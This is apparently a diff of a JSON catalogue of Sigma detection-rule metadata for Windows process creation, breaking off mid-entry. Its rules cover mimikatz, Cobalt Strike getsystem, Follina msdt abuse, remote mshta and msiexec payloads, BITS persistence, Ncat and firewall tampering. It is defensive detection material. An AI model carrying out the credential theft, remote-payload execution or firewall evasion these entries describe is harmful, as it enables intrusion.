+ "author": "oscd.community, Natalia Shornikova",
+ "creation_date": "2020/10/13",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": "proc_creation_win_manage_bde_lolbas.yml",
+ "level": "medium",
+ "logsource.category": "process_creation",
+ "logsource.product": "windows",
+ "refs": [
+ "https://lolbas-project.github.io/lolbas/Scripts/Manage-bde/",
+ "https://gist.github.com/bohops/735edb7494fe1bd1010d67823842b712",
+ "https://twitter.com/bohops/status/980659399495741441",
+ "https://twitter.com/JohnLaTwC/status/1223292479270600706",
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1216/T1216.md",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_manage_bde_lolbas.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion",
+ "attack.t1216"
+ ]
+ },
+ "uuid": "c363385c-f75d-4753-a108-c1a8e28bdbda",
+ "value": "Suspicious Usage of the Manage-bde.wsf Script"
+ },
+ {
+ "description": "Detects the use of getsystem Meterpreter/Cobalt Strike command by detecting a specific service starting",
+ "meta": {
+ "author": "Teymur Kheirkhabarov, Ecco, Florian Roth",
+ "creation_date": "2019/10/26",
+ "falsepositive": [
+ "Commandlines containing components like cmd accidentally",
+ "Jobs and services started with cmd"
+ ],
+ "filename": "proc_creation_win_meterpreter_or_cobaltstrike_getsystem_service_start.yml",
+ "level": "high",
+ "logsource.category": "process_creation",
+ "logsource.product": "windows",
+ "refs": [
+ 
"https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment",
+ "https://blog.cobaltstrike.com/2014/04/02/what-happens-when-i-type-getsystem/",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_meterpreter_or_cobaltstrike_getsystem_service_start.yml"
+ ],
+ "tags": [
+ "attack.privilege_escalation",
+ "attack.t1134.001",
+ "attack.t1134.002"
+ ]
+ },
+ "uuid": "15619216-e993-4721-b590-4c520615a67d",
+ "value": "Meterpreter or Cobalt Strike Getsystem Service Start"
+ },
+ {
+ "description": "Detection well-known mimikatz command line arguments",
+ "meta": {
+ "author": "Teymur Kheirkhabarov, oscd.community, David ANDRE (additional keywords), Tim Shelton",
+ "creation_date": "2019/10/22",
+ "falsepositive": [
+ "Legitimate Administrator using tool for password recovery"
+ ],
+ "filename": "proc_creation_win_mimikatz_command_line.yml",
+ "level": "medium",
+ "logsource.category": "process_creation",
+ "logsource.product": "windows",
+ "refs": [
+ "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment",
+ "https://tools.thehacker.recipes/mimikatz/modules",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mimikatz_command_line.yml"
+ ],
+ "tags": [
+ "attack.credential_access",
+ "attack.t1003.001",
+ "attack.t1003.002",
+ "attack.t1003.004",
+ "attack.t1003.005",
+ "attack.t1003.006"
+ ]
+ },
+ "uuid": "a642964e-bead-4bed-8910-1bb4d63e3b4d",
+ "value": "Mimikatz Command Line"
+ },
+ {
+ "description": "Detects MMC20.Application Lateral Movement; specifically looks for the spawning of the parent MMC.exe with a command line of \"-Embedding\" as a child of svchost.exe",
+ "meta": {
+ "author": "@2xxeformyshirt (Security Risk Advisors) - rule; Teymur Kheirkhabarov (idea)",
+ "creation_date": "2020/03/04",
+ "falsepositive": [
+ "Unlikely"
+ ],
+ "filename": "proc_creation_win_mmc20_lateral_movement.yml",
+ 
"level": "high",
+ "logsource.category": "process_creation",
+ "logsource.product": "windows",
+ "refs": [
+ "https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/",
+ "https://drive.google.com/file/d/1lKya3_mLnR3UQuCoiYruO3qgu052_iS_/view?usp=sharing",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mmc20_lateral_movement.yml"
+ ],
+ "tags": [
+ "attack.execution",
+ "attack.t1021.003"
+ ]
+ },
+ "uuid": "f1f3bf22-deb2-418d-8cce-e1a45e46a5bd",
+ "value": "MMC20 Lateral Movement"
+ },
+ {
+ "description": "Detects a Windows command line executable started from MMC",
+ "meta": {
+ "author": "Karneades, Swisscom CSIRT",
+ "creation_date": "2019/08/05",
+ "falsepositive": "No established falsepositives",
+ "filename": "proc_creation_win_mmc_spawn_shell.yml",
+ "level": "high",
+ "logsource.category": "process_creation",
+ "logsource.product": "windows",
+ "refs": [
+ "https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mmc_spawn_shell.yml"
+ ],
+ "tags": [
+ "attack.lateral_movement",
+ "attack.t1021.003"
+ ]
+ },
+ "uuid": "05a2ab7e-ce11-4b63-86db-ab32e763e11d",
+ "value": "MMC Spawning Windows Shell"
+ },
+ {
+ "description": "Detect malicious GPO modifications can be used to implement many other malicious behaviors.",
+ "meta": {
+ "author": "frack113",
+ "creation_date": "2022/08/19",
+ "falsepositive": [
+ "Legitimate use"
+ ],
+ "filename": "proc_creation_win_modify_group_policy_settings.yml",
+ "level": "medium",
+ "logsource.category": "process_creation",
+ "logsource.product": "windows",
+ "refs": [
+ "https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1484.001/T1484.001.md",
+ 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_modify_group_policy_settings.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion",
+ "attack.privilege_escalation",
+ "attack.t1484.001"
+ ]
+ },
+ "uuid": "ada4b0c4-758b-46ac-9033-9004613a150d",
+ "value": "Modify Group Policy Settings"
+ },
+ {
+ "description": "Detects modification of an existing service on a compromised host in order to execute an arbitrary payload when the service is started or killed as a method of persistence.",
+ "meta": {
+ "author": "Sreeman",
+ "creation_date": "2020/09/29",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": "proc_creation_win_modif_of_services_for_via_commandline.yml",
+ "level": "medium",
+ "logsource.category": "process_creation",
+ "logsource.product": "windows",
+ "refs": [
+ "https://pentestlab.blog/2020/01/22/persistence-modify-existing-service/",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_modif_of_services_for_via_commandline.yml"
+ ],
+ "tags": [
+ "attack.persistence",
+ "attack.t1543.003",
+ "attack.t1574.011"
+ ]
+ },
+ "uuid": "38879043-7e1e-47a9-8d46-6bec88e201df",
+ "value": "Modification Of Existing Services For Persistence"
+ },
+ {
+ "description": "BITS will allow you to schedule a command to execute after a successful download to notify you that the job is finished. When the job runs on the system the command specified in the BITS job will be executed. This can be abused by actors to create a backdoor within the system and for persistence. 
It will be chained in a BITS job to schedule the download of malware/additional binaries and execute the program after being downloaded",
+ "meta": {
+ "author": "Sreeman",
+ "creation_date": "2020/10/29",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": "proc_creation_win_monitoring_for_persistence_via_bits.yml",
+ "level": "medium",
+ "logsource.category": "process_creation",
+ "logsource.product": "windows",
+ "refs": [
+ "https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html",
+ "http://0xthem.blogspot.com/2014/03/t-emporal-persistence-with-and-schtasks.html",
+ "https://isc.sans.edu/diary/Wipe+the+drive+Stealthy+Malware+Persistence+Mechanism+-+Part+1/15394",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_monitoring_for_persistence_via_bits.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion",
+ "attack.t1197"
+ ]
+ },
+ "uuid": "b9cbbc17-d00d-4e3d-a827-b06d03d2380d",
+ "value": "Monitoring For Persistence Via BITS"
+ },
+ {
+ "description": "In Kaspersky's 2020 Incident Response Analyst Report they listed legitimate tool \"Mouse Lock\" as being used for both credential access and collection in security incidents.",
+ "meta": {
+ "author": "Cian Heasley",
+ "creation_date": "2020/08/13",
+ "falsepositive": [
+ "Legitimate uses of Mouse Lock software"
+ ],
+ "filename": "proc_creation_win_mouse_lock.yml",
+ "level": "medium",
+ "logsource.category": "process_creation",
+ "logsource.product": "windows",
+ "refs": [
+ "https://github.com/klsecservices/Publications/blob/657deb6a6eb6e00669afd40173f425fb49682eaa/Incident-Response-Analyst-Report-2020.pdf",
+ "https://sourceforge.net/projects/mouselock/",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mouse_lock.yml"
+ ],
+ "tags": [
+ "attack.credential_access",
+ "attack.collection",
+ "attack.t1056.002"
+ ]
+ },
+ "uuid": "c9192ad9-75e5-43eb-8647-82a0a5b493e3",
+ 
"value": "Mouse Lock Credential Gathering"
+ },
+ {
+ "description": "Detects file execution using the msdeploy.exe lolbin",
+ "meta": {
+ "author": "Beyu Denis, oscd.community",
+ "creation_date": "2020/10/18",
+ "falsepositive": [
+ "System administrator Usage"
+ ],
+ "filename": "proc_creation_win_msdeploy.yml",
+ "level": "medium",
+ "logsource.category": "process_creation",
+ "logsource.product": "windows",
+ "refs": [
+ "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Msdeploy/",
+ "https://twitter.com/pabraeken/status/995837734379032576",
+ "https://twitter.com/pabraeken/status/999090532839313408",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msdeploy.yml"
+ ],
+ "tags": [
+ "attack.execution",
+ "attack.t1218"
+ ]
+ },
+ "uuid": "646bc99f-6682-4b47-a73a-17b1b64c9d34",
+ "value": "Execute Files with Msdeploy.exe"
+ },
+ {
+ "description": "Detects processes leveraging the \"ms-msdt\" handler or the \"msdt.exe\" binary to execute arbitrary commands as seen in the follina (CVE-2022-30190) vulnerability",
+ "meta": {
+ "author": "Nasreddine Bencherchali (rule)",
+ "creation_date": "2022/05/29",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": "proc_creation_win_msdt.yml",
+ "level": "high",
+ "logsource.category": "process_creation",
+ "logsource.product": "windows",
+ "refs": [
+ "https://twitter.com/nao_sec/status/1530196847679401984",
+ "https://app.any.run/tasks/713f05d2-fe78-4b9d-a744-f7c133e3fafb/",
+ "https://twitter.com/_JohnHammond/status/1531672601067675648",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msdt.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion",
+ "attack.t1202"
+ ]
+ },
+ "uuid": "258fc8ce-8352-443a-9120-8a11e4857fa5",
+ "value": "Execute Arbitrary Commands Using MSDT.EXE"
+ },
+ {
+ "description": "Detects diagcab leveraging the \"ms-msdt\" handler or the \"msdt.exe\" binary to execute arbitrary commands as seen in 
CVE-2022-30190",
+ "meta": {
+ "author": "GossiTheDog (rule), frack113 (sigma version)",
+ "creation_date": "2022/06/09",
+ "falsepositive": [
+ "Legitimate usage of \".diagcab\" files"
+ ],
+ "filename": "proc_creation_win_msdt_diagcab.yml",
+ "level": "high",
+ "logsource.category": "process_creation",
+ "logsource.product": "windows",
+ "refs": [
+ "https://github.com/GossiTheDog/ThreatHunting/blob/e85884abbf05d5b41efc809ea6532b10b45bd05c/AdvancedHuntingQueries/DogWalk-DiagCab",
+ "https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-9015912909545e72ed42cbac4d1e96295e8964579c406d23fd9c47a8091576a0",
+ "https://irsl.medium.com/the-trouble-with-microsofts-troubleshooters-6e32fc80b8bd",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msdt_diagcab.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion",
+ "attack.t1202"
+ ]
+ },
+ "uuid": "6545ce61-a1bd-4119-b9be-fcbee42c0cf3",
+ "value": "Execute MSDT.EXE Using Diagcab File"
+ },
+ {
+ "description": "Detects execution of msdt.exe using the \"cab\" flag which could indicates suspicious diagcab files with embedded answer files leveraging CVE-2022-30190",
+ "meta": {
+ "author": "Nasreddine Bencherchali",
+ "creation_date": "2022/06/21",
+ "falsepositive": [
+ "Legitimate usage of \".diagcab\" files"
+ ],
+ "filename": "proc_creation_win_msdt_susp_cab_options.yml",
+ "level": "medium",
+ "logsource.category": "process_creation",
+ "logsource.product": "windows",
+ "refs": [
+ "https://twitter.com/nas_bench/status/1537896324837781506",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msdt_susp_cab_options.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion",
+ "attack.t1202"
+ ]
+ },
+ "uuid": "dc4576d4-7467-424f-9eee-fd2b02855fe0",
+ "value": "MSDT.EXE Execution With Suspicious Cab Option"
+ },
+ {
+ "description": "Detects msdt.exe executed by a suspicious parent as seen in 
CVE-2022-30190 / Follina exploitation",
+ "meta": {
+ "author": "Nextron Systems",
+ "creation_date": "2022/06/01",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": "proc_creation_win_msdt_susp_parent.yml",
+ "level": "high",
+ "logsource.category": "process_creation",
+ "logsource.product": "windows",
+ "refs": [
+ "https://twitter.com/nao_sec/status/1530196847679401984",
+ "https://app.any.run/tasks/713f05d2-fe78-4b9d-a744-f7c133e3fafb/",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msdt_susp_parent.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion",
+ "attack.t1036",
+ "attack.t1218"
+ ]
+ },
+ "uuid": "7a74da6b-ea76-47db-92cc-874ad90df734",
+ "value": "MSDT Executed with Suspicious Parent"
+ },
+ {
+ "description": "Detects the suspicious minimized start of MsEdge browser, which can be used to download files from the Internet",
+ "meta": {
+ "author": "Florian Roth",
+ "creation_date": "2022/01/11",
+ "falsepositive": [
+ "Software that uses MsEdge to download components in the background (see ParentImage, ParentCommandLine)"
+ ],
+ "filename": "proc_creation_win_msedge_minimized_download.yml",
+ "level": "high",
+ "logsource.category": "process_creation",
+ "logsource.product": "windows",
+ "refs": [
+ "https://twitter.com/mrd0x/status/1478234484881436672?s=12",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msedge_minimized_download.yml"
+ ],
+ "tags": [
+ "attack.command_and_control",
+ "attack.t1105"
+ ]
+ },
+ "uuid": "94771a71-ba41-4b6e-a757-b531372eaab6",
+ "value": "Suspicious Minimized MSEdge Start"
+ },
+ {
+ "description": "Detects execution of the \"mshta\" utility with an argument containing the \"http\" keyword, which could indicate that an attacker is executing a remotely hosted malicious hta file",
+ "meta": {
+ "author": "Nasreddine Bencherchali",
+ "creation_date": "2022/08/08",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": 
"proc_creation_win_mshta_http.yml",
+ "level": "high",
+ "logsource.category": "process_creation",
+ "logsource.product": "windows",
+ "refs": [
+ "https://www.trendmicro.com/en_us/research/22/e/avoslocker-ransomware-variant-abuses-driver-file-to-disable-anti-Virus-scans-log4shell.html",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mshta_http.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion",
+ "attack.execution",
+ "attack.t1218.005"
+ ]
+ },
+ "uuid": "b98d0db6-511d-45de-ad02-e82a98729620",
+ "value": "Mshta Remotely Hosted HTA File Execution"
+ },
+ {
+ "description": "Identifies suspicious mshta.exe commands.",
+ "meta": {
+ "author": "E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community",
+ "creation_date": "2019/10/24",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": "proc_creation_win_mshta_javascript.yml",
+ "level": "high",
+ "logsource.category": "process_creation",
+ "logsource.product": "windows",
+ "refs": [
+ "https://eqllib.readthedocs.io/en/latest/analytics/6bc283c4-21f2-4aed-a05c-a9a3ffa95dd4.html",
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.005/T1218.005.md",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mshta_javascript.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion",
+ "attack.t1218.005"
+ ]
+ },
+ "uuid": "67f113fa-e23d-4271-befa-30113b3e08b1",
+ "value": "Mshta JavaScript Execution"
+ },
+ {
+ "description": "Detects a Windows command line executable started from MSHTA",
+ "meta": {
+ "author": "Michael Haag",
+ "creation_date": "2019/01/16",
+ "falsepositive": [
+ "Printer software / driver installations",
+ "HP software"
+ ],
+ "filename": "proc_creation_win_mshta_spawn_shell.yml",
+ "level": "high",
+ "logsource.category": "process_creation",
+ "logsource.product": "windows",
+ "refs": [
+ "https://www.trustedsec.com/july-2015/malicious-htas/", 
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mshta_spawn_shell.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion",
+ "attack.t1218.005",
+ "car.2013-02-003",
+ "car.2013-03-001",
+ "car.2014-04-003"
+ ]
+ },
+ "uuid": "03cc0c25-389f-4bf8-b48d-11878079f1ca",
+ "value": "MSHTA Spawning Windows Shell"
+ },
+ {
+ "description": "Detects MsiExec loading a DLL and calling its DllUnregisterServer function",
+ "meta": {
+ "author": "frack113",
+ "creation_date": "2022/04/24",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": "proc_creation_win_msiexec_dll.yml",
+ "level": "medium",
+ "logsource.category": "process_creation",
+ "logsource.product": "windows",
+ "refs": [
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.007/T1218.007.md",
+ "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/msiexec",
+ "https://twitter.com/_st0pp3r_/status/1583914515996897281",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msiexec_dll.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion",
+ "attack.t1218.007"
+ ]
+ },
+ "uuid": "84f52741-8834-4a8c-a413-2eb2269aa6c8",
+ "value": "Suspicious Msiexec Load DLL"
+ },
+ {
+ "description": "Adversaries may abuse msiexec.exe to proxy the execution of malicious payloads",
+ "meta": {
+ "author": "frack113",
+ "creation_date": "2022/04/16",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": "proc_creation_win_msiexec_embedding.yml",
+ "level": "medium",
+ "logsource.category": "process_creation",
+ "logsource.product": "windows",
+ "refs": [
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.007/T1218.007.md",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msiexec_embedding.yml"
+ ],
+ "tags": [
+ "attack.t1218.007",
+ "attack.defense_evasion"
+ ]
+ },
+ 
"uuid": "4a2a2c3e-209f-4d01-b513-4155a540b469",
+ "value": "Suspicious MsiExec Embedding Parent"
+ },
+ {
+ "description": "Adversaries may abuse msiexec.exe to proxy execution of malicious payloads.\nMsiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi)\n",
+ "meta": {
+ "author": "frack113",
+ "creation_date": "2022/01/16",
+ "falsepositive": [
+ "Legitimate script"
+ ],
+ "filename": "proc_creation_win_msiexec_execute_dll.yml",
+ "level": "medium",
+ "logsource.category": "process_creation",
+ "logsource.product": "windows",
+ "refs": [
+ "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/msiexec",
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.007/T1218.007.md",
+ "https://twitter.com/_st0pp3r_/status/1583914515996897281",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msiexec_execute_dll.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion",
+ "attack.t1218.007"
+ ]
+ },
+ "uuid": "6f4191bb-912b-48a8-9ce7-682769541e6d",
+ "value": "Suspicious Msiexec Execute Arbitrary DLL"
+ },
+ {
+ "description": "Adversaries may abuse msiexec.exe to proxy execution of malicious payloads.\nMsiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi)\n",
+ "meta": {
+ "author": "frack113",
+ "creation_date": "2022/01/16",
+ "falsepositive": [
+ "Legitimate script"
+ ],
+ "filename": "proc_creation_win_msiexec_install_quiet.yml",
+ "level": "medium",
+ "logsource.category": "process_creation",
+ "logsource.product": "windows",
+ "refs": [
+ "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/msiexec",
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.007/T1218.007.md",
+ 
"https://twitter.com/_st0pp3r_/status/1583914244344799235",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msiexec_install_quiet.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion",
+ "attack.t1218.007"
+ ]
+ },
+ "uuid": "79a87aa6-e4bd-42fc-a5bb-5e6fbdcd62f5",
+ "value": "Suspicious Msiexec Quiet Install"
+ },
+ {
+ "description": "Detects usage of Msiexec.exe to install packages hosted remotely quietly",
+ "meta": {
+ "author": "Nasreddine Bencherchali",
+ "creation_date": "2022/10/28",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": "proc_creation_win_msiexec_install_remote.yml",
+ "level": "medium",
+ "logsource.category": "process_creation",
+ "logsource.product": "windows",
+ "refs": [
+ "https://www.microsoft.com/en-us/security/blog/2022/10/27/raspberry-robin-worm-part-of-larger-ecosystem-facilitating-pre-ransomware-activity/",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msiexec_install_remote.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion",
+ "attack.t1218.007"
+ ]
+ },
+ "uuid": "8150732a-0c9d-4a99-82b9-9efb9b90c40c",
+ "value": "Suspicious Msiexec Quiet Install From Remote Location"
+ },
+ {
+ "description": "Detects process injection using Microsoft Remote Asssistance (Msra.exe) which has been used for discovery and persistence tactics",
+ "meta": {
+ "author": "Alexander McDonald",
+ "creation_date": "2022/06/24",
+ "falsepositive": [
+ "Legitimate use of Msra.exe"
+ ],
+ "filename": "proc_creation_win_msra_process_injection.yml",
+ "level": "high",
+ "logsource.category": "process_creation",
+ "logsource.product": "windows",
+ "refs": [
+ "https://www.microsoft.com/security/blog/2021/12/09/a-closer-look-at-qakbots-latest-building-blocks-and-how-to-knock-them-down/",
+ "https://www.fortinet.com/content/dam/fortinet/assets/analyst-reports/ar-qakbot.pdf",
+ 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msra_process_injection.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion",
+ "attack.t1055"
+ ]
+ },
+ "uuid": "744a188b-0415-4792-896f-11ddb0588dbc",
+ "value": "Msra.exe Process Injection"
+ },
+ {
+ "description": "Adversaries may use Valid Accounts to log into a computer using the Remote Desktop Protocol (RDP). The adversary may then perform actions as the logged-on user.",
+ "meta": {
+ "author": "frack113",
+ "creation_date": "2022/01/07",
+ "falsepositive": [
+ "WSL (Windows Sub System For Linux)",
+ "Other currently unknown software"
+ ],
+ "filename": "proc_creation_win_mstsc.yml",
+ "level": "medium",
+ "logsource.category": "process_creation",
+ "logsource.product": "windows",
+ "refs": [
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1021.001/T1021.001.md#t1021001---remote-desktop-protocol",
+ "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/mstsc",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mstsc.yml"
+ ],
+ "tags": [
+ "attack.lateral_movement",
+ "attack.t1021.001"
+ ]
+ },
+ "uuid": "954f0af7-62dd-418f-b3df-a84bc2c7a774",
+ "value": "Remote Desktop Protocol Use Mstsc"
+ },
+ {
+ "description": "Detects multiple suspicious process in a limited timeframe",
+ "meta": {
+ "author": "juju4",
+ "creation_date": "2019/01/16",
+ "falsepositive": [
+ "False positives depend on scripts and administrative tools used in the monitored environment"
+ ],
+ "filename": "proc_creation_win_multiple_susp_cli.yml",
+ "level": "low",
+ "logsource.category": "process_creation",
+ "logsource.product": "windows",
+ "refs": [
+ "https://car.mitre.org/wiki/CAR-2013-04-002",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_multiple_susp_cli.yml"
+ ],
+ "tags": [
+ "car.2013-04-002",
+ 
"attack.execution", + "attack.t1059" + ] + }, + "uuid": "61ab5496-748e-4818-a92f-de78e20fe7f1", + "value": "Quick Execution of a Series of Suspicious Commands" + }, + { + "description": "Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network", + "meta": { + "author": "frack113, Florian Roth", + "creation_date": "2021/07/21", + "falsepositive": [ + "Legitimate ncat use" + ], + "filename": "proc_creation_win_netcat_execution.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://nmap.org/ncat/", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1095/T1095.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_netcat_execution.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1095" + ] + }, + "uuid": "e31033fc-33f0-4020-9a16-faf9b31cbf08", + "value": "Ncat Execution" + }, + { + "description": "Detects netsh commands that opens the port 3389 used for RDP, used in Sarwent Malware", + "meta": { + "author": "Sander Wiebing", + "creation_date": "2020/05/23", + "falsepositive": [ + "Legitimate administration" + ], + "filename": "proc_creation_win_netsh_allow_port_rdp.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://labs.sentinelone.com/sarwent-malware-updates-command-detonation/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_netsh_allow_port_rdp.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.004" + ] + }, + "uuid": "01aeb693-138d-49d2-9403-c4f52d7d3d62", + "value": "Netsh RDP Port Opening" + }, + { + "description": "Allow Incoming Connections by Port or Application on Windows Firewall", + "meta": { + "author": "Markus Neis, Sander Wiebing", + "creation_date": 
"2019/01/29", + "falsepositive": [ + "Legitimate administration" + ], + "filename": "proc_creation_win_netsh_fw_add.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://attack.mitre.org/software/S0246/ (Lazarus HARDRAIN)", + "https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-RAT-and-Staging-Report.pdf", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_netsh_fw_add.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.004" + ] + }, + "uuid": "cd5cfd80-aa5f-44c0-9c20-108c4ae12e3c", + "value": "Netsh Port or Application Allowed" + }, + { + "description": "Detects Netsh commands that allows a suspcious application location on Windows Firewall", + "meta": { + "author": "Sander Wiebing, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community", + "creation_date": "2020/05/25", + "falsepositive": [ + "Legitimate administration" + ], + "filename": "proc_creation_win_netsh_fw_add_susp_image.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.virusradar.com/en/Win32_Kasidet.AD/description", + "https://www.hybrid-analysis.com/sample/07e789f4f2f3259e7559fdccb36e96814c2dbff872a21e1fa03de9ee377d581f?environmentId=100", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_netsh_fw_add_susp_image.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.004" + ] + }, + "uuid": "a35f5a72-f347-4e36-8895-9869b0d5fc6d", + "value": "Netsh Program Allowed with Suspcious Location" + }, + { + "description": "Detects the removal of a port or application rule in the Windows Firewall configuration using netsh", + "meta": { + "author": "frack113", + "creation_date": "2022/08/14", + "falsepositive": [ + "Legitimate administration" + ], + "filename": "proc_creation_win_netsh_fw_delete.yml", + 
"level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://app.any.run/tasks/8bbd5b4c-b82d-4e6d-a3ea-d454594a37cc/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_netsh_fw_delete.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.004" + ] + }, + "uuid": "1a5fefe6-734f-452e-a07d-fc1c35bce4b2", + "value": "Netsh Firewall Rule Deletion" + }, + { + "description": "Adversaries may modify system firewalls in order to bypass controls limiting network usage", + "meta": { + "author": "frack113", + "creation_date": "2022/01/09", + "falsepositive": [ + "Legitimate administration" + ], + "filename": "proc_creation_win_netsh_fw_enable_group_rule.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.004/T1562.004.md#atomic-test-3---allow-smb-and-rdp-on-microsoft-defender-firewall", + "https://docs.microsoft.com/en-us/troubleshoot/windows-server/networking/netsh-advfirewall-firewall-control-firewall-behavior", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_netsh_fw_enable_group_rule.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.004" + ] + }, + "uuid": "347906f3-e207-4d18-ae5b-a9403d6bcdef", + "value": 